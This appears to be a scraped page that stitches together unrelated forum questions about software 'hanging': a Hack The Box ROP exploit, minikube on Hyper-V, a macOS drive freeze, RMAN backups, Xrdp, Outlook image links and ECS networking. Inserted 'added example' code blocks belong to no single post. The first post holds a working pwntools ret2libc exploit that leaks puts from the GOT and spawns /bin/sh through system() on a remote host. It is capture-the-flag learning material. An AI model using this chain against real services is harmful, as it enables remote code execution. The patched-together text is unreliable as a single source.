ROP Chain with pwntools hanging on partial puts statement

NOTE: The IP here is generic for the challenge and the instance referenced by the port has already been closed.

Hardening:

root@kali:~/htb/challenges/pwn/ropme# gdb -q ./ropme
Reading symbols from ./ropme...(no debugging symbols found)...done.
gdb-peda$ checksec
CANARY    : disabled
FORTIFY   : disabled
NX        : ENABLED
PIE       : disabled
RELRO     : Partial

I have a binary that I have exploited locally and am now trying to port the exploit to a remote server.

The issue I have is that the script is hanging after I leak the address of puts from the GOT.

I thought the issue was the version of libc I was using, but having tried a few versions, I think what I am using is correct.

I have found the version by running the script and leaking puts…

Leaked: \x90\x06\x9b\x8c\x90\x7f
root@kali:~/htb/challenges/pwn/ropme# libc-database/find puts 9b0690
ubuntu-xenial-amd64-libc6 (id libc6_2.23-0ubuntu10_amd64)
archive-glibc (id libc6_2.23-0ubuntu11_amd64)

I noticed, though, that when I removed the section of the script that attempts to leak __libc_start_main, the script hangs, and if that is commented out it hangs on the payload being sent.

I think this is down to pwntools expecting a string that doesn’t fully print.

You can see from the output below that it only prints (via puts) a partial string from the expected program output: only the "R" out of the string "ROP me outside, how 'about dah?". I added the newline character below.

root@kali:~/htb/challenges/pwn/ropme# python exploit.py
[+] Opening connection to 159.65.208.41 on port 34582: Done
[+] Leaked puts@GLIBC: \x90\x86{\x18\x18\x7f
R
Traceback (most recent call last):
  File "exploit.py", line 29, in <module>
    p.recvuntil("ROP me outside, how 'about dah?\n")
  File "/usr/local/lib/python2.7/dist-packages/pwnlib/tubes/tube.py", line 305, in recvuntil
    res = self.recv(timeout=self.timeout)
  File "/usr/local/lib/python2.7/dist-packages/pwnlib/tubes/tube.py", line 78, in recv
    return self._recv(numb, timeout) or ''
  File "/usr/local/lib/python2.7/dist-packages/pwnlib/tubes/tube.py", line 156, in _recv
    if not self.buffer and not self._fillbuffer(timeout):
  File "/usr/local/lib/python2.7/dist-packages/pwnlib/tubes/tube.py", line 126, in _fillbuffer
    data = self.recv_raw(self.buffer.get_fill_size())
  File "/usr/local/lib/python2.7/dist-packages/pwnlib/tubes/sock.py", line 37, in recv_raw
    data = self.sock.recv(numb, *a)
KeyboardInterrupt
[*] Closed connection to 159.65.208.41 port 34582

My question is, what is interfering with the output of puts or is the issue elsewhere in the implementation of my script?

Main script…

#!/usr/bin/python
from pwn import *

HOST = '159.65.208.41'
PORT = 34582

p = remote(HOST, PORT)

## Stage 1
junk = "A" * 72                 # padding up to the saved return address
pop_rdi = p64(0x4006d3)         # pop rdi ; ret gadget (addresses are fixed, PIE disabled)
got_puts = p64(0x601018)        # puts@GOT
plt_puts = p64(0x4004e0)        # puts@PLT
plt_main = p64(0x400626)        # main(), to get a second overflow after the leak
got_main = p64(0x601020)        # __libc_start_main@GOT (used by the commented-out leak below)

# Leak address of puts in libc: puts(puts@GOT), then return to main
payload = junk + pop_rdi + got_puts + plt_puts + plt_main
p.recvuntil("ROP me outside, how 'about dah?\n")
p.sendline(payload)
# Takes the first 8 bytes of whatever has arrived so far. puts() emits the
# 6 significant address bytes followed by '\n', and main()'s prompt may
# already be queued behind them.
leaked_puts = p.recv()[:8].strip().ljust(8, "\x00")
log.success("Leaked puts@GLIBC: " + str(leaked_puts))
leaked_puts = u64(leaked_puts)

# Leak address of __libc_start_main
# payload = junk + pop_rdi + got_main + plt_puts + plt_main
# p.recvuntil("ROP me outside, how 'about dah?\n")
# p.sendline(payload)
# leaked_got_main = p.recv()[:8].strip().ljust(8, "\x00")
# log.success("Leaked __libc_start_main: " + str(leaked_got_main))
# leaked_got_main = u64(leaked_got_main)

# Stage 2
pop_rdi = p64(0x4006d3)

# libc6_2.23-0ubuntu10_amd64 + libc6_2.23-0ubuntu11_amd64
libc_puts = 0x6f690             # offset of puts in libc
libc_sys = 0x45390              # offset of system in libc
libc_sh = 0x18cd57              # offset of "/bin/sh" in libc

offset = leaked_puts - libc_puts          # libc base
system = p64(offset + libc_sys)
sh = p64(offset + libc_sh)

payload = junk + pop_rdi + sh + system    # system("/bin/sh")

log.success("Only reaches here")
p.recvuntil("ROP me outside, how 'about dah?\n")
p.sendline(payload)
log.success("Payload sent...")

# raw_input()
p.interactive()
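An added example, not part of the question or of the posted script, that reproduces the leak-parsing step in plain Python 3 with no pwntools and no network connection. The byte stream is constructed from the output shown above on the assumption that puts() writes the six significant address bytes plus a newline and that main()'s prompt is already queued behind them when recv() is called; FakeTube is a minimal stand-in for the pwntools tube and models only recv() and recvuntil(). Under that assumption, taking the first 8 bytes of recv() picks up the newline and the "R" of the prompt, so the unpacked value is wrong and the following recvuntil() for the full prompt can never match (the real tube blocks there until its timeout, which is the hang in the traceback); reading up to the newline and padding to 8 bytes gives the expected address and leaves the prompt intact.

```python
import struct

PROMPT = b"ROP me outside, how 'about dah?\n"

# Constructed stand-in for what the remote sends back after the stage-1 chain:
# puts(puts@GOT) prints the 6 significant bytes of puts@GLIBC followed by '\n',
# then main() runs again and prints its prompt. The address bytes are the ones
# shown in the question's output, not a fresh leak.
LEAK_BYTES = b"\x90\x86\x7b\x18\x18\x7f"
SAMPLE_STREAM = LEAK_BYTES + b"\n" + PROMPT


class FakeTube:
    """Minimal stand-in for a pwntools tube over an in-memory byte buffer.

    recv() hands back whatever is buffered (up to numb bytes); recvuntil()
    consumes through the delimiter, or returns None when the delimiter is
    not in the stream (where the real tube would block until timeout)."""

    def __init__(self, data):
        self.buf = bytearray(data)

    def recv(self, numb=4096):
        out = bytes(self.buf[:numb])
        del self.buf[:numb]
        return out

    def recvuntil(self, delim):
        idx = self.buf.find(delim)
        if idx < 0:
            return None
        end = idx + len(delim)
        out = bytes(self.buf[:end])
        del self.buf[:end]
        return out


def u64(raw):
    """Little-endian unpack of exactly 8 bytes, as pwntools' u64 does on x86-64."""
    return struct.unpack("<Q", raw)[0]


def leak_as_posted(tube):
    """The parse from the posted script: first 8 bytes of whatever arrived."""
    raw = tube.recv()[:8].strip().ljust(8, b"\x00")
    addr = u64(raw)
    # The script then waits for the next prompt before sending stage 2.
    prompt_seen = tube.recvuntil(PROMPT) is not None
    return addr, prompt_seen


def leak_fixed(tube):
    """Read exactly the line puts() produced, pad to 8 bytes, keep the prompt."""
    line = tube.recvuntil(b"\n")
    if line is None:
        raise RuntimeError("no newline after the leak")
    raw = line[:-1]
    # puts() stops at the first NUL, so a user-space x86-64 address prints as
    # at most six bytes. If a low byte of the address happened to be 0x0a this
    # read would come up short; reconnecting for a fresh leak is the usual fix.
    if not 1 <= len(raw) <= 6:
        raise RuntimeError("unexpected leak length %d" % len(raw))
    addr = u64(raw.ljust(8, b"\x00"))
    prompt_seen = tube.recvuntil(PROMPT) is not None
    return addr, prompt_seen


if __name__ == "__main__":
    for name, fn in (("as posted", leak_as_posted), ("fixed", leak_fixed)):
        addr, ok = fn(FakeTube(SAMPLE_STREAM))
        print("%-9s puts@GLIBC = %#x, prompt found afterwards: %s" % (name, addr, ok))
```

In the posted script the equivalent change is replacing `p.recv()[:8].strip()` with `p.recvuntil("\n")[:-1]` before the `.ljust(8, "\x00")`; the later `recvuntil` for the prompt then has the whole "ROP me outside..." line still in the buffer to match against.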

Minikube VM hanging on Hyper-V

I have this issue where I can't stop a minikube VM running on Hyper-V. The problem was that I deleted the VM before stopping it (manually, from the Hyper-V interface). Now when I run minikube stop in PowerShell as admin it throws an error saying that Hyper-V can't find any VM with that name. This is correct because I deleted it from there, but my question would be: where can I stop that VM, or how can I perform a clean install of Hyper-V (it remembers all the configs after disabling it)?

My terminal and filesystem are hanging on MacOS

So I have had an external hard drive connected to my laptop, and have been writing millions of files to the external hard drive. One directory even has over 2 million folders at the first level deep.

Probably a dozen times my computer has frozen up. I have about 50+ windowed applications open, and every now and then my screen gets that Nintendo glitch look where everything turns to lines and shakes. The glitching part doesn't cause the freezing, but something is causing it. When it freezes the spinner goes on forever and I have to press the power button to shut it off.

I leave it shut off for at least 15 seconds before turning it on again. When I start again, it gives me back all my windows as they were, except the terminal windows aren’t in the right spot anymore, they’re just at the home directory.

I say all this because now I can’t even type ls inside /Volumes, it just hangs. I tried hard unplugging the hard drive and plugging it back in. It registers in the finder window as being present, but I simply can’t do ls /Volumes. I can’t cd /Volumes either. I can’t go into the hard drive. This only started happening after I’ve been writing millions of files to it.

It’s a Western Digital external hard drive.

Oh wait! Now ls has finally completed. It took about 10 minutes for it to register fully. Hmm… Wondering if you guys might know why it's doing this, why it doesn't let me get into the drive until a long time has passed.

So okay, now I just started writing more files. It let me write a few thousand more but now it's hanging again. In these cases I can't CTRL+C or CTRL+D to get out of the process; I have to open Activity Monitor and Force Quit. But then it's back to not being able to ls in /Volumes. Wondering what the heck is going on.

I have also been typically running 3-5 processes all writing files in parallel.

RMAN archive backups hanging due to Data Domain issue cause Linux system hang

Dears,

We see that our Linux system became unresponsive. During that time we see from the crashdump of the server that there were 23k zombie Oracle processes and a lot of uninterruptible Oracle processes. Upon further analysis we saw that more than 12 RMAN archive backups had been hanging for more than 3-4 hours because of a hardware issue on the underlying backup Data Domain device; all were killed and someone restarted everything at once. Could someone please tell me if you have faced a similar issue? Backups should have been stopped during such issues, but can we be sure that the hanging backups caused the contention? Please note that the hardware issue on the Data Domain was causing restarts of the Data Domain device and intermittent connectivity issues.

Data Migration Assistant hanging on assessment

I am doing an assessment at a client with DMA. For most of the instances it goes through without issues. There are 3 instances that I am not able to complete because the assessment gets stuck. I left the assessment running for 3 days and it still had not finished.

I am currently running manual assessments for individual databases.

Regards,

Xrdp hanging (Windows 10 to Xubuntu)

I have Xrdp installed and up to date on my Xubuntu machine and have opened ports 3389 and 3350. However, when I attempt to start a remote desktop session from my Windows 10 machine, the connection hangs on a blank blue screen after login.

After about 5 minutes the connection fails with the error below:

  • connecting to sesman ip 127.0.0.1 port 3350
  • sesman connect ok
  • sending login info to session manager, please wait…
  • login successful for display 10
  • started connecting
  • connection problem, giving up
  • some problem

Xrdp was manually enabled, and all users were logged out prior to the remote session. Both the Xorg and X11rdp session types were used, with the same results.

Remote Session Error

How can I prevent Outlook from hanging when receiving Google Drive links?

Why, you might wonder, is this happening?

Google inserts an image after the link and that image URI does not contain a protocol (http or https). It looks something like this:

<img src="//ssl.gstatic.com/ui/v1/icons/common/x_8px.png"> 

Now, in a web browser, this will work just fine; the browser will use whatever protocol was used to load the page (usually https these days).

In Outlook, however, this is interpreted as a Windows File Sharing link.

So, Outlook decides to try to access that address using Windows File Sharing (on port 445) and, rather than denying the request, Google just ignores it, and Outlook stops responding until it times out 30 seconds later. And Outlook does this every time you open the message.

If you forward the message, Outlook tacks on a file protocol to the image URI:

<img src="file://ssl.gstatic.com/ui/v1/icons/common/x_8px.png"> 

And, of course, if the recipient has Outlook, he or she will experience the same issue (the file protocol doesn’t help; it just confirms that Outlook thinks it’s a reference to a file accessible via Windows File Sharing).

This appears to be version agnostic – it’s an issue with all versions of Outlook up to 2016.
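An added example, not from the answer above, of the check and rewrite a mail filter could apply before a message reaches Outlook: it finds `<img>` sources in the two forms the answer shows (the protocol-relative `//host/path` that Google sends and the `file://host/path` that Outlook writes when the message is forwarded) and gives them an explicit https scheme, so the client has no reason to treat the host as a file share. The sample message is constructed for this example; the function name, the regular expression and the assumption that rewriting message HTML on the way in is acceptable in your environment are mine, not anything the answer describes.

```python
import re

# Matches the src attribute of an <img> tag whose value is either
# protocol-relative ("//host/path") or the "file://host/path" form Outlook
# writes on forwarding. Absolute http:// and https:// sources do not match
# and are left untouched. Quotes may be single or double.
_IMG_SRC = re.compile(
    r"""(<img\b[^>]*?\bsrc\s*=\s*)(["'])(?://|file://)([^"']+)\2""",
    re.IGNORECASE,
)


def rewrite_protocol_relative(html, scheme="https"):
    """Return (rewritten_html, hosts) where hosts lists the host part of each
    image source that was given an explicit scheme."""
    hosts = []

    def fix(match):
        target = match.group(3)                  # host/path without any scheme
        hosts.append(target.split("/", 1)[0])
        return "%s%s%s://%s%s" % (match.group(1), match.group(2),
                                   scheme, target, match.group(2))

    return _IMG_SRC.sub(fix, html), hosts


# Constructed sample: the image tag from the answer next to an absolute one
# that must be left alone, plus the forwarded variant with file:// prepended.
SAMPLE_MESSAGE = (
    '<p>Shared a file with you</p>'
    '<img src="//ssl.gstatic.com/ui/v1/icons/common/x_8px.png">'
    '<img src="https://example.test/logo.png">'
)
FORWARDED_MESSAGE = SAMPLE_MESSAGE.replace('src="//', 'src="file://')


if __name__ == "__main__":
    for label, msg in (("original", SAMPLE_MESSAGE), ("forwarded", FORWARDED_MESSAGE)):
        out, hosts = rewrite_protocol_relative(msg)
        print("%s: rewrote %s" % (label, hosts))
        print(out)
```

The returned host list doubles as a detection signal: any message where it is non-empty is one Outlook would otherwise have tried to reach over port 445 on every open.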

ECS Ec2 Instance hanging outgoing TCP connections

I'm having an issue with an EC2/ECS server in AWS.
In my company we have a dockerized application running on an ECS cluster (its nodes are running on Amazon Linux 2 ECS-optimized AMIs). The ECS cluster is located in private VPC subnets with a NAT Gateway so they can access the Internet. In front of it we have load balancers in subnets with an Internet gateway (so they can be accessed from outside). Security groups and network ACLs are properly configured. Further, there are two docker apps; let's call them application A and application B. Each of them is behind an Internet-facing Application Load Balancer.
Then, how it works: application A receives requests from the Internet, puts the request on application A and also connects to some other application. It's possible that container A and container B are running on the same ECS cluster node. At some point application A is not able to connect to the Internet, or only works rarely.
First I thought it was a problem with the application; however, after logging in to the Linux host I noticed that even with the application A container stopped and no other containers running (apart from the ECS agent container) the operating system has problems establishing TCP connections: when I do curl www.google.com, the first few requests are fine but then one hangs, and this repeats. Ping is working. The dockerized containers are configured to use docker bridged networking and register targets behind the load balancers as EC2 instances pointing to the ports on which the application is listening. Any ideas what could cause the issue?